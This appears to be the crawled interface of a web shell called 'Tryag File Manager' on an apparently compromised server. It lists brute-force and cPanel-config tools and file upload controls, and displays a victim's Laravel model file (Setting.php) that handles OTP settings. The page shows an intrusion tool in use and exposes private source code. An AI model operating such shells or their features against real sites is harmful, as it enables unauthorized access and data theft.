Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current none :
/
proc
/
self
/
root
/
var
/
www
/
html
/
tpid-aden
/
api
/
app
/
Models
/
Or
Select Your none :
Upload File :
New :
File
Dir
//proc/self/root/var/www/html/tpid-aden/api/app/Models/Setting.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Setting extends Model { use HasFactory; protected $fillable = [ 'key', 'value' ]; public static function resendRegister() { return self::where('key', 'otp_resend_register')->first()->value ?? '5'; } public static function expiredRegister() { return self::where('key', 'otp_expired_register')->first()->value ?? '5'; } }